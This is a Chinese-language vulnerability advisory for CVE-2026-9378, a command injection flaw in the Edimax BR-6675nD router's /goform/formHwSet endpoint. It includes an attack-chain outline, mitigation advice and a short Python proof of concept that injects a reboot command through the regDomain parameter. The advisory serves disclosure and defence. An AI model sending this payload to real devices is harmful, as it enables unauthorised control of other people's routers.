IPBUF安全漏洞报告
English
CVE-2026-9378 CVSS 6.3 中危

CVE-2026-9378 Edimax路由器命令注入漏洞

披露日期: 2026-05-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-9378
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Edimax BR-6675nD

相关标签

命令注入CVE-2026-9378EdimaxIoT路由器RCE

漏洞概述

Edimax BR-6675nD 路由器固件 1.12 版本被发现存在严重的安全设计缺陷。漏洞根源在于 `/goform/formHwSet` 接口的 POST 请求处理函数未能正确校验用户输入。攻击者能够通过操纵 `regDomain`、`nic0Addr` 等特定参数注入任意操作系统命令。鉴于该漏洞可被远程触发且已有公开利用代码,未授权攻击者可借此控制设备,建议尽快修复。

技术细节

该漏洞属于典型的 OS 命令注入漏洞,源于不安全的输入处理机制。在 Edimax BR-6675nD 设备的 Web 管理界面中,`/goform/formHwSet` 端点负责处理硬件相关的配置请求。当用户提交 POST 请求时,后端 CGI 程序 `formHwSet` 会接收包括 `regDomain`、`nic0Addr` 等在内的多个参数。由于代码缺乏严格的输入验证和过滤机制,直接将这些参数拼接到系统 Shell 命令中执行。攻击者可以通过在参数值中插入 Shell 元字符(如 `;`、`|`、`&` 或反引号)来截断原有命令并拼接执行任意恶意指令。虽然 CVSS 评分判定需要低权限(PR:L),但在路由器场景下,通常意味着需要登录管理后台。然而,一旦触发,攻击者即可在设备底层操作系统上下文中执行命令,进而完全控制设备或窃取敏感数据。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出 Edimax BR-6675nD 设备及其开放的管理端口(通常为 80 或 443)。
STEP 2
2. 获取访问权限
由于 CVSS 指标显示 PR:L(低权限),攻击者可能需要通过暴力破解或利用默认凭证登录 Web 管理界面。
STEP 3
3. 漏洞利用
攻击者构造恶意的 HTTP POST 请求发送至 `/goform/formHwSet`,在 `regDomain` 等参数中注入 Shell 元字符(如 `;` 或 `|`)。
STEP 4
4. 命令执行
后端 CGI 程序未过滤输入,直接将恶意参数传递给系统 Shell 执行,导致攻击者注入的命令在设备上运行。
STEP 5
5. 建立控制
攻击者利用执行的命令下载后门、修改系统配置或窃取敏感信息,从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual IP) target_url = "http://192.168.1.1/goform/formHwSet" # Vulnerable parameters and payload # Using a basic command separator to verify injection payload = { "regDomain": "US; `reboot`", # Example payload to reboot the device "ABandregDomain": "US", "nic0Addr": "192.168.1.100", "nic1Addr": "", "wlanAddr": "", "inicAddr": "" } try: # Sending the POST request # Note: Authentication might be required based on CVSS PR:L response = requests.post(target_url, data=payload, timeout=5) if response.status_code == 200: print("Payload sent successfully. Check if device rebooted or command executed.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施
由于厂商尚未发布补丁且未对披露做出响应,建议用户立即禁用路由器的远程管理功能,并将管理界面仅限于本地访问。同时,建议在网络边界部署防火墙,严格限制对设备 80/443 端口的入站访问,以防止被远程扫描和攻击。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表